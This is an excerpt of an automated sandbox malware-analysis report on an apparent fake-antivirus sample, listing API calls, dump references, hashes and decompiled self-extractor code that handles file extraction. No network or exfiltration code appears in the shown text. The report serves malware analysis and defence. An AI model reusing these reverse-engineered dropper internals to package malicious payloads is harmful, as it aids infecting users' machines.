                                                                                                                                                  0x0040d43a
                                                                                                                                                  0x0040d443
                                                                                                                                                  0x0040d449
                                                                                                                                                  0x0040d44f
                                                                                                                                                  0x0040d45d
                                                                                                                                                  0x0040d462
                                                                                                                                                  0x0040d465
                                                                                                                                                  0x0040d46a
                                                                                                                                                  0x0040d470
                                                                                                                                                  0x0040d472
                                                                                                                                                  0x0040d472
                                                                                                                                                  0x0040d482
                                                                                                                                                  0x0040d48d
                                                                                                                                                  0x0040d495
                                                                                                                                                  0x0040d495
                                                                                                                                                  0x0040d4a6
                                                                                                                                                  0x0040d4a8
                                                                                                                                                  0x0040d4af
                                                                                                                                                  0x0040d4b2
                                                                                                                                                  0x0040d4b2
                                                                                                                                                  0x0040d4b4
                                                                                                                                                  0x0040d4ba
                                                                                                                                                  0x0040d4bc
                                                                                                                                                  0x0040d4c2
                                                                                                                                                  0x0040d4ce
                                                                                                                                                  0x0040d4ce
                                                                                                                                                  0x0040d4c2
                                                                                                                                                  0x0040d4d3
                                                                                                                                                  0x0040d4d8
                                                                                                                                                  0x0040d4e4
                                                                                                                                                  0x0040d4e7
                                                                                                                                                  0x0040d4e7
                                                                                                                                                  0x0040d4ec
                                                                                                                                                  0x0040d4f8

                                                                                                                                                  APIs
                                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 0040D348
                                                                                                                                                    • Part of subcall function 0040E428: GetCPInfo.KERNEL32(00000000,?,?,00000000,?,?,0040E4E2,?,0040A6E8), ref: 0040E439
                                                                                                                                                    • Part of subcall function 0040E428: IsDBCSLeadByte.KERNEL32(00000000,?,00000000), ref: 0040E44D
                                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0040D358
                                                                                                                                                  • SetEnvironmentVariableA.KERNELBASE(sfxcmd,00000000,00000000), ref: 0040D376
                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,00000400), ref: 0040D384
                                                                                                                                                  • SetEnvironmentVariableA.KERNELBASE(sfxname,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe), ref: 0040D390
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe,00000400), ref: 0040D3A6
                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 0040D3B7
                                                                                                                                                  • LoadIconA.USER32 ref: 0040D3C8
                                                                                                                                                  • LoadBitmapA.USER32 ref: 0040D3DB
                                                                                                                                                  • DialogBoxParamA.USER32 ref: 0040D43A
                                                                                                                                                  • DeleteObject.GDI32(00419EE8), ref: 0040D4A6
                                                                                                                                                  • DeleteObject.GDI32(5D050A36), ref: 0040D4B2
                                                                                                                                                  • OleUninitialize.OLE32(?), ref: 0040D4EC
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D4F8
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000005.00000002.453491580.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000005.00000002.453477570.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.453861838.0000000000412000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454046622.0000000000414000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454248478.000000000041E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000005.00000002.454381669.0000000000421000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Module$DeleteEnvironmentFileLoadNameObjectVariable$BitmapByteCommandDialogExitHandleIconInfoInitializeLeadLineParamProcessUninitialize
                                                                                                                                                  • String ID: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exe$STARTDLG$sfxcmd$sfxname$|LA
                                                                                                                                                  • API String ID: 2002691505-3831385095
                                                                                                                                                  • Opcode ID: a64e9b8bb87abff073727f12cb01139305408d7666d82abbf9609f215f0c5f05
                                                                                                                                                  • Instruction ID: 1b9db9b8f4c8a255ada22d75d2d3daf09faad69adfa1b9a70ca480eaf30b4961
                                                                                                                                                  • Opcode Fuzzy Hash: a64e9b8bb87abff073727f12cb01139305408d7666d82abbf9609f215f0c5f05
                                                                                                                                                  • Instruction Fuzzy Hash: A7416170940305BBD700BFB1DD999EA3AA8EB44305B15843FF601B22E1DB785C55CB6E
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                  			E00403A34(void* __ecx, void* __edx, intOrPtr _a4, char _a7, char* _a8, char _a11, intOrPtr _a12, signed int _a15) {
                                                                                                                                                  				signed int _v5;
                                                                                                                                                  				signed char* _v12;
                                                                                                                                                  				signed int _v16;
                                                                                                                                                  				char _v20;
                                                                                                                                                  				char _v21;
                                                                                                                                                  				signed int _v25;
                                                                                                                                                  				char _v26;
                                                                                                                                                  				char _v1052;
                                                                                                                                                  				char _v3108;
                                                                                                                                                  				char _v4133;
                                                                                                                                                  				char _v4137;
                                                                                                                                                  				char _v4156;
                                                                                                                                                  				char _v6204;
                                                                                                                                                  				char _v7228;
                                                                                                                                                  				char _v8392;
                                                                                                                                                  				char _v8396;
                                                                                                                                                  				char _v11484;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t404;
                                                                                                                                                  				signed int _t414;
                                                                                                                                                  				signed int _t421;
                                                                                                                                                  				signed int _t424;
                                                                                                                                                  				signed int _t431;
                                                                                                                                                  				signed int _t437;
                                                                                                                                                  				char* _t441;
                                                                                                                                                  				char _t445;
                                                                                                                                                  				signed char _t450;
                                                                                                                                                  				signed int _t452;
                                                                                                                                                  				signed int _t456;
                                                                                                                                                  				signed int _t467;
                                                                                                                                                  				signed int _t471;
                                                                                                                                                  				signed int _t474;
                                                                                                                                                  				signed int _t491;
                                                                                                                                                  				intOrPtr _t501;
                                                                                                                                                  				signed int _t511;
                                                                                                                                                  				signed int _t512;
                                                                                                                                                  				signed int _t520;
                                                                                                                                                  				signed int _t523;
                                                                                                                                                  				signed int _t524;
                                                                                                                                                  				char _t527;
                                                                                                                                                  				signed int _t531;
                                                                                                                                                  				signed int _t541;
                                                                                                                                                  				signed int _t558;
                                                                                                                                                  				signed int _t559;
                                                                                                                                                  				signed int _t562;
                                                                                                                                                  				signed int _t570;
                                                                                                                                                  				signed int _t580;
                                                                                                                                                  				short* _t582;
                                                                                                                                                  				char* _t587;
                                                                                                                                                  				signed int _t591;
                                                                                                                                                  				short _t592;
                                                                                                                                                  				signed int _t597;
                                                                                                                                                  				signed int _t600;
                                                                                                                                                  				char* _t602;
                                                                                                                                                  				signed int _t604;
                                                                                                                                                  				signed int _t609;
                                                                                                                                                  				void* _t612;
                                                                                                                                                  				signed int _t621;
                                                                                                                                                  				signed int _t623;
                                                                                                                                                  				signed int _t627;
                                                                                                                                                  				intOrPtr _t628;
                                                                                                                                                  				signed int _t630;
                                                                                                                                                  				signed int _t634;
                                                                                                                                                  				intOrPtr _t640;
                                                                                                                                                  				char _t641;
                                                                                                                                                  				signed int _t653;
                                                                                                                                                  				void* _t706;
                                                                                                                                                  				signed int _t714;
                                                                                                                                                  				void* _t715;
                                                                                                                                                  				char* _t716;
                                                                                                                                                  				void* _t718;
                                                                                                                                                  
                                                                                                                                                  				_t706 = __edx;
                                                                                                                                                  				E00401200(0x2cd8);
                                                                                                                                                  				_t640 = _a4;
                                                                                                                                                  				_t716 = _a8;
                                                                                                                                                  				_t715 = __ecx;
                                                                                                                                                  				_v20 =  *((intOrPtr*)(_t640 + 0x329b));
                                                                                                                                                  				if(_a12 != 0) {
                                                                                                                                                  					L5:
                                                                                                                                                  					_t404 =  *((intOrPtr*)(_t716 + 0x4678));
                                                                                                                                                  					_a4 = _t404;
                                                                                                                                                  					__eflags = _t404 - 0x74;
                                                                                                                                                  					if(_t404 == 0x74) {
                                                                                                                                                  						__eflags =  *((char*)(_t715 + 0x1ddf));
                                                                                                                                                  						 *((char*)(_t715 + 0x11dd)) = 0;
                                                                                                                                                  						if( *((char*)(_t715 + 0x1ddf)) != 0) {
                                                                                                                                                  							L202:
                                                                                                                                                  							return 0;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags =  *(_t640 + 0x28cc);
                                                                                                                                                  						if( *(_t640 + 0x28cc) != 0) {
                                                                                                                                                  							L24:
                                                                                                                                                  							OemToCharA(_t716 + 0x46d8, _t716 + 0x46d8);
                                                                                                                                                  							E0040A477( &_v1052, _t716 + 0x46d8);
                                                                                                                                                  							_v6204 = 0;
                                                                                                                                                  							_v21 = 0;
                                                                                                                                                  							_t414 = E00402AEE(_t640, _t716 + 0x46a8,  &_v21, 4); // executed
                                                                                                                                                  							__eflags = _t414;
                                                                                                                                                  							_a15 = _t414 != 0;
                                                                                                                                                  							__eflags = _a15;
                                                                                                                                                  							if(_a15 != 0) {
                                                                                                                                                  								__eflags = _v21;
                                                                                                                                                  								if(_v21 == 0) {
                                                                                                                                                  									 *((char*)(_t715 + 0x559)) = 0;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  							__eflags =  *(_t716 + 0x46b0) & 0x00000200;
                                                                                                                                                  							if(( *(_t716 + 0x46b0) & 0x00000200) == 0) {
                                                                                                                                                  								L29:
                                                                                                                                                  								_v5 = 0;
                                                                                                                                                  								L30:
                                                                                                                                                  								asm("sbb eax, eax");
                                                                                                                                                  								_t644 = _t715 + 0x15de;
                                                                                                                                                  								__eflags = _v5;
                                                                                                                                                  								_v16 =  ~(_v5 & 0x000000ff) & _t715 + 0x000015de;
                                                                                                                                                  								if(_v5 != 0) {
                                                                                                                                                  									E00407589(_t716, _t716 + 0x4ad8,  &_v6204);
                                                                                                                                                  									_t621 = E0040E115(_t644,  &_v6204,  &_v7228, 0x1000000);
                                                                                                                                                  									__eflags = _t621;
                                                                                                                                                  									if(_t621 != 0) {
                                                                                                                                                  										_t623 = E0040793A( &_v7228);
                                                                                                                                                  										__eflags = _t623;
                                                                                                                                                  										if(_t623 != 0) {
                                                                                                                                                  											E0040A477( &_v1052,  &_v7228);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								E0040748A(_t715,  &_v1052,  &_v1052);
                                                                                                                                                  								_t421 = E00401BE7(_t716);
                                                                                                                                                  								__eflags = _t421;
                                                                                                                                                  								if(_t421 != 0) {
                                                                                                                                                  									L19:
                                                                                                                                                  									return 1;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags =  *(_t716 + 0x46b0) & 0x00000800;
                                                                                                                                                  								if(( *(_t716 + 0x46b0) & 0x00000800) == 0) {
                                                                                                                                                  									_t424 = E00401BD5(_t716);
                                                                                                                                                  									__eflags = _t424;
                                                                                                                                                  									if(_t424 != 0) {
                                                                                                                                                  										L45:
                                                                                                                                                  										E00401C00(_t716);
                                                                                                                                                  										 *(_t715 + 0x4ee) =  *(_t716 + 0x46b0) >> 0x00000001 & 0x00000001;
                                                                                                                                                  										 *((char*)(_t715 + 0x4ef)) = 0;
                                                                                                                                                  										asm("sbb ecx, [esi+0x5384]");
                                                                                                                                                  										_t649 = _t716;
                                                                                                                                                  										_t431 = E004054ED(_t716,  *((intOrPtr*)(_t716 + 0x6d80)) -  *(_t716 + 0x5380),  *((intOrPtr*)(_t716 + 0x6d84)), 0);
                                                                                                                                                  										__eflags = _a15;
                                                                                                                                                  										_a11 = 0;
                                                                                                                                                  										_a7 = 0;
                                                                                                                                                  										_v25 = 0;
                                                                                                                                                  										if(_a15 != 0) {
                                                                                                                                                  											L47:
                                                                                                                                                  											__eflags = _v20 - 0x49;
                                                                                                                                                  											_push(_v25);
                                                                                                                                                  											_push((_t431 & 0xffffff00 | _v20 == 0x00000049) & 0x000000ff);
                                                                                                                                                  											_push( *(_t640 + 0x29ba) & 0x000000ff);
                                                                                                                                                  											_t437 = E0040BB56(_t649,  &_v1052,  &_v6204);
                                                                                                                                                  											__eflags = _t437;
                                                                                                                                                  											if(_t437 == 0) {
                                                                                                                                                  												goto L202;
                                                                                                                                                  											}
                                                                                                                                                  											__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                  											if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                  												L52:
                                                                                                                                                  												_v12 = _t715 + 0x11de;
                                                                                                                                                  												E0040A477(_t715 + 0x11de, _t640 + 0x810);
                                                                                                                                                  												__eflags =  *((intOrPtr*)(_t640 + 0x28c8)) - 5;
                                                                                                                                                  												if( *((intOrPtr*)(_t640 + 0x28c8)) != 5) {
                                                                                                                                                  													L59:
                                                                                                                                                  													_a7 = 0;
                                                                                                                                                  													L56:
                                                                                                                                                  													__eflags = _v20 - 0x45;
                                                                                                                                                  													if(_v20 == 0x45) {
                                                                                                                                                  														L60:
                                                                                                                                                  														_t441 = E004073DB( &_v1052);
                                                                                                                                                  														L61:
                                                                                                                                                  														E0040A5E2(_v12, _t441);
                                                                                                                                                  														_t445 = E0040DA9A( *_v12 & 0x000000ff);
                                                                                                                                                  														__eflags = _a7;
                                                                                                                                                  														_v26 = _t445;
                                                                                                                                                  														if(_a7 != 0) {
                                                                                                                                                  															__eflags =  *((char*)(_t715 + 0x11df)) - 0x5f;
                                                                                                                                                  															if( *((char*)(_t715 + 0x11df)) == 0x5f) {
                                                                                                                                                  																_t597 = E004072B6( *((char*)(_t715 + 0x11e0)));
                                                                                                                                                  																__eflags = _t597;
                                                                                                                                                  																if(_t597 != 0) {
                                                                                                                                                  																	__eflags = _v26 - 0x41 - 0x19;
                                                                                                                                                  																	if(_v26 - 0x41 <= 0x19) {
                                                                                                                                                  																		 *((char*)(_t715 + 0x11df)) = 0x3a;
                                                                                                                                                  																	}
                                                                                                                                                  																}
                                                                                                                                                  															}
                                                                                                                                                  														}
                                                                                                                                                  														__eflags = _v5;
                                                                                                                                                  														if(_v5 == 0) {
                                                                                                                                                  															__eflags = 0;
                                                                                                                                                  															 *(_t715 + 0x15de) = 0;
                                                                                                                                                  															L81:
                                                                                                                                                  															__eflags = _v25;
                                                                                                                                                  															if(_v25 != 0) {
                                                                                                                                                  																L83:
                                                                                                                                                  																_a7 = 0;
                                                                                                                                                  																L84:
                                                                                                                                                  																__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                  																if( *((char*)(_t640 + 0x28c4)) != 0) {
                                                                                                                                                  																	L86:
                                                                                                                                                  																	__eflags = _v20 - 0x45;
                                                                                                                                                  																	if(_v20 == 0x45) {
                                                                                                                                                  																		L88:
                                                                                                                                                  																		E00403556( &_v11484);
                                                                                                                                                  																		_push(0);
                                                                                                                                                  																		__eflags = E00406045( &_v11484, _t706, _v12, _v16,  &_v11484);
                                                                                                                                                  																		if(__eflags == 0) {
                                                                                                                                                  																			__eflags =  *((char*)(_t640 + 0x28c4));
                                                                                                                                                  																			L93:
                                                                                                                                                  																			if(__eflags == 0) {
                                                                                                                                                  																				L95:
                                                                                                                                                  																				__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                  																				if(( *(_t716 + 0x46b0) & 0x00000004) != 0) {
                                                                                                                                                  																					__eflags =  *((char*)(_t715 + 0x115c));
                                                                                                                                                  																					if( *((char*)(_t715 + 0x115c)) == 0) {
                                                                                                                                                  																						E0040325C(0x414c7c, 1);
                                                                                                                                                  																						_a7 = 0;
                                                                                                                                                  																					}
                                                                                                                                                  																				}
                                                                                                                                                  																				_t450 =  *(_t716 + 0x46c8);
                                                                                                                                                  																				__eflags = _t450 - 0x24;
                                                                                                                                                  																				if(_t450 != 0x24) {
                                                                                                                                                  																					__eflags = _t450 - 0x1d;
                                                                                                                                                  																					if(_t450 != 0x1d) {
                                                                                                                                                  																						__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                  																						if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                  																							E0040B2A9(_t716 + 0x17, E004098F7(0x6c),  &_v1052);
                                                                                                                                                  																							_t718 = _t718 + 0xc;
                                                                                                                                                  																							_a7 = 0;
                                                                                                                                                  																							E0040325C(0x414c7c, 1);
                                                                                                                                                  																						}
                                                                                                                                                  																					}
                                                                                                                                                  																				}
                                                                                                                                                  																				_t652 =  &_v4156;
                                                                                                                                                  																				E00404EC3( &_v4156);
                                                                                                                                                  																				_push( *(_t716 + 0x46cc));
                                                                                                                                                  																				_t452 = E004057B6();
                                                                                                                                                  																				__eflags = _t452;
                                                                                                                                                  																				if(_t452 != 0) {
                                                                                                                                                  																					L138:
                                                                                                                                                  																					__eflags = _a7;
                                                                                                                                                  																					if(_a7 != 0) {
                                                                                                                                                  																						goto L143;
                                                                                                                                                  																					}
                                                                                                                                                  																					goto L139;
                                                                                                                                                  																				} else {
                                                                                                                                                  																					_t652 = _t716;
                                                                                                                                                  																					_t523 = E00401BD5(_t716);
                                                                                                                                                  																					__eflags = _t523;
                                                                                                                                                  																					if(_t523 == 0) {
                                                                                                                                                  																						_t524 =  *(_t640 + 0x29ba);
                                                                                                                                                  																						__eflags = _t524;
                                                                                                                                                  																						if(_t524 != 0) {
                                                                                                                                                  																							__eflags = _a7;
                                                                                                                                                  																							if(_a7 != 0) {
                                                                                                                                                  																								_a11 = 1;
                                                                                                                                                  																							}
                                                                                                                                                  																						}
                                                                                                                                                  																						__eflags = _v20 - 0x45;
                                                                                                                                                  																						if(_v20 == 0x45) {
                                                                                                                                                  																							L130:
                                                                                                                                                  																							__eflags = _a7;
                                                                                                                                                  																							if(_a7 == 0) {
                                                                                                                                                  																								L139:
                                                                                                                                                  																								__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                  																								if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                  																									__eflags = _a7;
                                                                                                                                                  																									if(_a7 == 0) {
                                                                                                                                                  																										L195:
                                                                                                                                                  																										E00405074(_t640,  &_v4156);
                                                                                                                                                  																										__eflags = _a15;
                                                                                                                                                  																										if(_a15 != 0) {
                                                                                                                                                  																											_t394 = _t715 + 0x554;
                                                                                                                                                  																											 *_t394 =  *(_t715 + 0x554) + 1;
                                                                                                                                                  																											__eflags =  *_t394;
                                                                                                                                                  																										}
                                                                                                                                                  																										L197:
                                                                                                                                                  																										__eflags =  *((char*)(_t715 + 0x4ef));
                                                                                                                                                  																										if( *((char*)(_t715 + 0x4ef)) != 0) {
                                                                                                                                                  																											goto L202;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                  																										if( *((intOrPtr*)(_t716 + 4)) == 0xffffffff) {
                                                                                                                                                  																											goto L202;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags = _a7;
                                                                                                                                                  																										if(_a7 != 0) {
                                                                                                                                                  																											goto L19;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags =  *((char*)(_t716 + 0x6d89));
                                                                                                                                                  																										if( *((char*)(_t716 + 0x6d89)) == 0) {
                                                                                                                                                  																											L18:
                                                                                                                                                  																											E00401264(_t716);
                                                                                                                                                  																											goto L19;
                                                                                                                                                  																										}
                                                                                                                                                  																										__eflags = _v25;
                                                                                                                                                  																										if(_v25 != 0) {
                                                                                                                                                  																											goto L19;
                                                                                                                                                  																										}
                                                                                                                                                  																										goto L202;
                                                                                                                                                  																									}
                                                                                                                                                  																									L143:
                                                                                                                                                  																									__eflags = _v25;
                                                                                                                                                  																									if(_v25 == 0) {
                                                                                                                                                  																										__eflags = _a11;
                                                                                                                                                  																										if(_a11 == 0) {
                                                                                                                                                  																											__eflags = _v20 - 0x50;
                                                                                                                                                  																											if(_v20 != 0x50) {
                                                                                                                                                  																												_t512 = E00405051( &_v4156);
                                                                                                                                                  																												__eflags = _t512;
                                                                                                                                                  																												if(_t512 != 0) {
                                                                                                                                                  																													E0040B2A9(_t716 + 0x17, E004098F7(0x406), _v12);
                                                                                                                                                  																													_t718 = _t718 + 0xc;
                                                                                                                                                  																													E00403471(0x414c7c, _t716 + 0x17, _v12);
                                                                                                                                                  																												}
                                                                                                                                                  																											}
                                                                                                                                                  																										}
                                                                                                                                                  																										_t273 = _t715 + 0x54c;
                                                                                                                                                  																										 *_t273 =  *(_t715 + 0x54c) + 1;
                                                                                                                                                  																										__eflags =  *_t273;
                                                                                                                                                  																									}
                                                                                                                                                  																									L149:
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x550)) =  *((intOrPtr*)(_t715 + 0x550)) + 1;
                                                                                                                                                  																									_t653 = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x510)) = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x514)) = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x518)) = 0;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x51c)) = 0;
                                                                                                                                                  																									__eflags =  *(_t716 + 0x6d88);
                                                                                                                                                  																									 *(_t715 + 0x538) =  *(_t715 + 0x538) | 0xffffffff;
                                                                                                                                                  																									 *((intOrPtr*)(_t715 + 0x534)) = (0 |  *(_t716 + 0x6d88) != 0x00000000) - 1;
                                                                                                                                                  																									_t456 =  *(_t716 + 0x46b0) & 0x0000ffff;
                                                                                                                                                  																									__eflags = _t456 & 0x00000004;
                                                                                                                                                  																									if((_t456 & 0x00000004) != 0) {
                                                                                                                                                  																										_t653 =  *(_t716 + 0x46c8) & 0x000000ff;
                                                                                                                                                  																									}
                                                                                                                                                  																									__eflags =  *(_t716 + 0x46c8) - 0x24;
                                                                                                                                                  																									asm("sbb dl, dl");
                                                                                                                                                  																									asm("sbb eax, eax");
                                                                                                                                                  																									E00409013(_t715 + 0x28, _t653, _t715 + 0x115c,  ~(_t456 & 0x400) & _t716 + 0x000052e4, 0, _t706 + 0x00000001 & 0x000000ff);
                                                                                                                                                  																									 *(_t715 + 0x48) =  *(_t716 + 0x5380);
                                                                                                                                                  																									 *(_t715 + 0x4c) =  *(_t716 + 0x5384);
                                                                                                                                                  																									E00408FF3(_t715 + 0x28, _t716,  &_v4156);
                                                                                                                                                  																									_t467 = _a11;
                                                                                                                                                  																									 *(_t715 + 0x51) = _t467;
                                                                                                                                                  																									 *((char*)(_t715 + 0x52)) = _v25;
                                                                                                                                                  																									__eflags = _t467;
                                                                                                                                                  																									if(_t467 != 0) {
                                                                                                                                                  																										L163:
                                                                                                                                                  																										 *(_t640 + 0x2900) =  *(_t640 + 0x29ba);
                                                                                                                                                  																										_v4137 = _t467 & 0xffffff00 |  *(_t640 + 0x2900) == 0x00000000;
                                                                                                                                                  																										if( *(_t640 + 0x29ba) != 0) {
                                                                                                                                                  																											L165:
                                                                                                                                                  																											_v16 = 0;
                                                                                                                                                  																											L166:
                                                                                                                                                  																											_push(_v16);
                                                                                                                                                  																											_push(_t715 + 0x534);
                                                                                                                                                  																											_push(_v12);
                                                                                                                                                  																											_push(_t716);
                                                                                                                                                  																											_push(_t715 + 0x28);
                                                                                                                                                  																											_t471 = E0040E110();
                                                                                                                                                  																											__eflags = _t471;
                                                                                                                                                  																											if(_t471 == 0) {
                                                                                                                                                  																												__eflags =  *(_t716 + 0x46b0) & 0x00000001;
                                                                                                                                                  																												if(( *(_t716 + 0x46b0) & 0x00000001) == 0) {
                                                                                                                                                  																													__eflags =  *((char*)(_t716 + 0x46c9)) - 0x30;
                                                                                                                                                  																													if( *((char*)(_t716 + 0x46c9)) != 0x30) {
                                                                                                                                                  																														_t501 =  *((intOrPtr*)(_t715 + 0x548));
                                                                                                                                                  																														 *((intOrPtr*)(_t501 + 0x5760)) =  *((intOrPtr*)(_t716 + 0x5388));
                                                                                                                                                  																														 *(_t501 + 0x5764) =  *(_t716 + 0x538c);
                                                                                                                                                  																														 *((char*)(_t501 + 0x5778)) = 0;
                                                                                                                                                  																														__eflags =  *(_t716 + 0x46b0) >> 0x00000004 & 0x00000001;
                                                                                                                                                  																														E00411244( *(_t716 + 0x46c8) & 0x000000ff,  *(_t716 + 0x46b0) >> 0x00000004 & 1);
                                                                                                                                                  																													} else {
                                                                                                                                                  																														E004039B3(_t640, _t715 + 0x28,  *((intOrPtr*)(_t716 + 0x5388)),  *(_t716 + 0x538c));
                                                                                                                                                  																													}
                                                                                                                                                  																												}
                                                                                                                                                  																											} else {
                                                                                                                                                  																												 *((char*)(_t715 + 0x11dd)) = _v16;
                                                                                                                                                  																											}
                                                                                                                                                  																											__eflags =  *((intOrPtr*)(_t716 + 4)) - 0xffffffff;
                                                                                                                                                  																											if( *((intOrPtr*)(_t716 + 4)) != 0xffffffff) {
                                                                                                                                                  																												E00401264(_t716);
                                                                                                                                                  																											}
                                                                                                                                                  																											__eflags = _v25;
                                                                                                                                                  																											_v5 = 0;
                                                                                                                                                  																											if(_v25 != 0) {
                                                                                                                                                  																												L183:
                                                                                                                                                  																												__eflags = _a11;
                                                                                                                                                  																												if(_a11 != 0) {
                                                                                                                                                  																													goto L195;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _v20 - 0x58;
                                                                                                                                                  																												if(_v20 == 0x58) {
                                                                                                                                                  																													L186:
                                                                                                                                                  																													_push( *(_t716 + 0x46cc));
                                                                                                                                                  																													_t474 = E004057B6();
                                                                                                                                                  																													__eflags = _t474;
                                                                                                                                                  																													if(_t474 != 0) {
                                                                                                                                                  																														goto L195;
                                                                                                                                                  																													}
                                                                                                                                                  																													__eflags =  *((intOrPtr*)(_t640 + 0x28c0)) - _t474;
                                                                                                                                                  																													if( *((intOrPtr*)(_t640 + 0x28c0)) != _t474) {
                                                                                                                                                  																														_t369 = _t716 + 0x46cc;
                                                                                                                                                  																														 *_t369 =  *(_t716 + 0x46cc) & 0xffffffdf;
                                                                                                                                                  																														__eflags =  *_t369;
                                                                                                                                                  																													}
                                                                                                                                                  																													__eflags = _v5;
                                                                                                                                                  																													if(_v5 == 0) {
                                                                                                                                                  																														L192:
                                                                                                                                                  																														asm("sbb edx, edx");
                                                                                                                                                  																														asm("sbb eax, eax");
                                                                                                                                                  																														asm("sbb eax, eax");
                                                                                                                                                  																														E004053C5( &_v4156,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e88)) & _t716 + 0x00005310,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334); // executed
                                                                                                                                                  																														E00404F2E( &_v4156);
                                                                                                                                                  																														asm("sbb ecx, ecx");
                                                                                                                                                  																														asm("sbb ecx, ecx");
                                                                                                                                                  																														E0040504E(_t716 + 0x52ec,  ~( *(_t640 + 0x2e84)) & _t716 + 0x000052ec,  ~( *(_t640 + 0x2e8c)) & _t716 + 0x00005334);
                                                                                                                                                  																														__eflags =  *((char*)(_t640 + 0x2959));
                                                                                                                                                  																														if(__eflags == 0) {
                                                                                                                                                  																															E004057E8(__eflags,  &_v4133,  &_v3108,  *(_t716 + 0x46cc));
                                                                                                                                                  																														}
                                                                                                                                                  																														 *((char*)(_t715 + 0x11dd)) = 1;
                                                                                                                                                  																														goto L195;
                                                                                                                                                  																													} else {
                                                                                                                                                  																														__eflags =  *(_t640 + 0x2900);
                                                                                                                                                  																														if( *(_t640 + 0x2900) == 0) {
                                                                                                                                                  																															goto L195;
                                                                                                                                                  																														}
                                                                                                                                                  																														E0040503E( &_v4156);
                                                                                                                                                  																														goto L192;
                                                                                                                                                  																													}
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _v20 - 0x45;
                                                                                                                                                  																												if(_v20 != 0x45) {
                                                                                                                                                  																													goto L195;
                                                                                                                                                  																												}
                                                                                                                                                  																												goto L186;
                                                                                                                                                  																											} else {
                                                                                                                                                  																												_t491 =  *(_t716 + 0x6d88);
                                                                                                                                                  																												__eflags = _t491;
                                                                                                                                                  																												if(_t491 == 0) {
                                                                                                                                                  																													L178:
                                                                                                                                                  																													__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  !( *(_t716 + 0x46c0));
                                                                                                                                                  																													if( *((intOrPtr*)(_t715 + 0x534)) ==  !( *(_t716 + 0x46c0))) {
                                                                                                                                                  																														goto L183;
                                                                                                                                                  																													}
                                                                                                                                                  																													L179:
                                                                                                                                                  																													__eflags =  *(_t716 + 0x46b0) & 0x00000004;
                                                                                                                                                  																													_push( &_v1052);
                                                                                                                                                  																													if(( *(_t716 + 0x46b0) & 0x00000004) == 0) {
                                                                                                                                                  																														_push(0x71);
                                                                                                                                                  																													} else {
                                                                                                                                                  																														_push(0x70);
                                                                                                                                                  																													}
                                                                                                                                                  																													E004098F7();
                                                                                                                                                  																													_push(_t716 + 0x17);
                                                                                                                                                  																													E0040B2A9();
                                                                                                                                                  																													_v5 = 1;
                                                                                                                                                  																													E00402C95(E0040325C(0x414c7c, 3));
                                                                                                                                                  																													goto L183;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags =  *((intOrPtr*)(_t715 + 0x534)) -  *(_t716 + 0x46c0);
                                                                                                                                                  																												if( *((intOrPtr*)(_t715 + 0x534)) ==  *(_t716 + 0x46c0)) {
                                                                                                                                                  																													goto L183;
                                                                                                                                                  																												}
                                                                                                                                                  																												__eflags = _t491;
                                                                                                                                                  																												if(_t491 != 0) {
                                                                                                                                                  																													goto L179;
                                                                                                                                                  																												}
